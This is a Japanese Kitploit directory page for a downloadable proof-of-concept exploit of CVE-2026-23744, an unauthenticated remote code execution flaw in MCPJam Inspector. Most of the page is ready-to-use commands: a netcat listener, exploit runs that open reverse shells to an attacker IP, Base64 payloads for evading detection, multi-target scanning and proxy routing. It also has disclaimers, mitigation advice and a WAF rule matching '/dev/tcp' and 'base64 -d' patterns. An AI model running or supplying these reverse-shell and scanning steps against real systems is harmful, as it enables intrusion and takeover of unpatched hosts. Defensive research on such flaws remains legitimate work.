Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-23744-MCPJam-Exploit — CVE-2026-23744 - MCPJam Inspector Remote Code Execution(RCE)脆弱性の概念実証エクスプロイトです。このツールは、バージョン1.4.2以下のセキュリティ上の欠陥を実証し、セキュリティ研究者がパッチを検証するのに役立ちます。許可されたテストおよび教育目的のみに使用してください。複数のペイロードオプション、コマンド実行、セッション管理を含みます。 | Kitploit
ツール/GitHubGitHub/cerberusmrxi/cve-2026-23744-mcpjam-exploit
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール学習と教育ペイロード開発
GitHubcerberusmrxi/cve-2026-23744-mcpjam-exploit

CVE-2026-23744-MCPJam-Exploit

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-23744 - MCPJam Inspector Remote Code Execution(RCE)脆弱性の概念実証エクスプロイトです。このツールは、バージョン1.4.2以下のセキュリティ上の欠陥を実証し、セキュリティ研究者がパッチを検証するのに役立ちます。許可されたテストおよび教育目的のみに使用してください。複数のペイロードオプション、コマンド実行、セッション管理を含みます。

リポジトリを見る
711ヶ月前未レビュー

CVE-2026-23744 MCPJam Inspector RCE エクスプロイト

Security Research Python 3.7+ Version Author


⚠️ 免責事項

このツールは、許可されたセキュリティテストおよび教育目的のみに使用してください。不正使用は違法です。利用者はすべての行動に対する責任を負います。


📋 概要

このリポジトリには、CVE-2026-23744 の概念実証エクスプロイトが含まれています。これは、MCPJam Inspector バージョン <=1.4.2 で見つかった認証不要のリモートコード実行 (RCE) 脆弱性です。この脆弱性の CVSS スコアは 9.8 (Critical) で、ネットワーク経由の攻撃ベクトルによる深刻なリスクを示しています。

属性詳細
CVE IDCVE-2026-23744
脆弱性認証不要のリモートコード実行
影響を受けるバージョン<=1.4.2
CVSS スコア9.8 (Critical)
攻撃ベクトルネットワーク

📸 スクリーンショット

例

🚀 機能

このエクスプロイトツールは、効果的なセキュリティテストのために設計された包括的な機能セットを提供します。

  • マルチペイロードサポート: Bash、Python、Netcat、Perl、PHP、Base64 ペイロードを含みます。
  • コマンド実行: 出力をキャプチャしながらターゲットシステム上でコマンドを実行します。
  • ターゲットスキャン: 設定可能なレート制限で複数のターゲットをスキャンします。
  • セッション管理: 継続的なテストのための永続的なセッション管理。
  • プロキシサポート: 匿名またはルーティングされたトラフィックのためのプロキシ統合。
  • ターゲットフィンガープリンティング: ターゲットシステムの特性を特定します。
  • 自動リスナー設定: リバースシェルのためのリスナーを自動的に構成します。

📦 インストール

エクスプロイトツールをセットアップするには、次の手順に従ってください。

  1. リポジトリをクローン:

    root@kitploit:~
    git clone https://github.com/CerberusMrXi/CVE-2026-23744-MCPJam-RCE-Exploit.git
    cd CVE-2026-23744-MCPJam-RCE-Exploit
    
  2. 依存関係をインストール:

    root@kitploit:~
    pip install -r requirements.txt
    

🎯 使用例

基本エクスプロイト

基本エクスプロイトを開始するには、まずリスナーをセットアップし、次にエクスプロイトスクリプトを実行します。

root@kitploit:~
# リスナーを起動
nc -lvnp 4444

# エクスプロイトを実行
python exploit.py -u http://target-ip:8080 -l attacker-ip -p 4444

コマンド実行

単一のコマンドまたはファイルからのコマンドを実行します。

root@kitploit:~
# 単一のコマンドを実行
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -c "id; whoami"

# ファイルからコマンドを実行
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -C commands.txt

異なるペイロード

さまざまなシナリオに対応するために、複数のペイロードタイプを利用します。

root@kitploit:~
# Python リバースシェル
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t python

# Netcat リバースシェル
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t nc

# Base64 エンコードペイロード
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t base64

ターゲットスキャン

複数のターゲットをスキャンして脆弱性を確認します。

root@kitploit:~
# ターゲットファイルを作成
echo "http://192.168.1.10:8080" > targets.txt
echo "http://192.168.1.11:8080" >> targets.txt

# 脆弱なターゲットをスキャン
python exploit.py -f targets.txt -l 10.0.0.5 -p 4444 --scan

高度なオプション

フィンガープリンティング、プロキシ使用、詳細モード、自動リスナー設定などの高度な機能を探索します。

root@kitploit:~
# フィンガープリンティングあり
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --fingerprint

# プロキシあり
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --proxy http://127.0.0.1:8080

# 詳細モード
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -v

# 自動リスナー
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --listen

🔧 ペイロードタイプ


📊 出力例

root@kitploit:~
[+] Starting enhanced exploit against http://192.168.1.100:8080
[+] Reverse shell to 10.0.0.5:4444
[*] Session ID: AbCdEfGh
[*] Fingerprinting target...
[+] Target OS: Ubuntu
[+] Available capabilities: python3, perl, nc
[*] Executing exploit...
[+] Exploit successful!
[!] Check your netcat listener on 10.0.0.5:4444

🛡️ 緩和策

即時対応

CVE-2026-23744 から保護するためには、以下の即時対応が重要です。

  • MCPJam Inspector をバージョン >1.4.2 にアップグレードする。
  • 脆弱なシステムをネットワークから隔離する。
  • /api/mcp/connect への不審な POST リクエストを監視する。
  • Web アプリケーションファイアウォール (WAF) ルールを実装して悪意のあるパターンをブロックする。

WAF ルールの例

一般的な悪意のあるパターンをブロックする Nginx WAF ルールの例:

root@kitploit:~
location /api/mcp/connect {
    if ($request_body ~* "bash.*/dev/tcp") { return 403; }
    if ($request_body ~* "base64.*-d") { return 403; }
    proxy_pass http://backend;
}

❓ FAQ

Q: 使用するのは合法ですか?

A: このツールは、自分が所有しているか、明示的な書面による許可を得てテストするシステムに対してのみ合法的に使用できます。

Q: どのシステムが脆弱ですか?

A: MCPJam Inspector バージョン <=1.4.2 が脆弱です。

Q: システムを保護するにはどうすればよいですか?

A: 直ちに MCPJam Inspector をバージョン >1.4.2 にアップグレードしてください。


📚 参考文献

  • CVE-2026-23744 MITRE

👤 作成者

Sudeepa Wanigarathna

  • GitHub: @CerberusMrXi

📝 変更履歴

Version 2.0 (2026年7月14日)

  • ✅ リスナーチェックの信頼性を修正
  • ✅ コマンド実行モードを実装
  • ✅ ターゲットフィンガープリンティングを追加
  • ✅ セッション管理を強化
  • ✅ ペイロードフォールバックを追加

Version 1.0 (2026年7月10日)

  • ✅ 初回リリース

⚠️ 最終警告

このツールの不正使用は違法であり、以下のような深刻な結果を招く可能性があります。

  • 刑事訴追
  • 民事訴訟
  • 前科の永続化
  • 職業上の制裁

Sudeepa Wanigarathna によって ❤️ を込めて作成されました。

ツールをダウンロード
タイプコマンド最適な用途
bashBash リバースシェルほとんどの Linux システム
pythonPython3 リバースシェルPython がインストールされているシステム
ncNetcat リバースシェルnetcat があるシステム
perlPerl リバースシェルPerl がインストールされているシステム
phpPHP リバースシェルPHP がインストールされているシステム
base64Base64 エンコード検出回避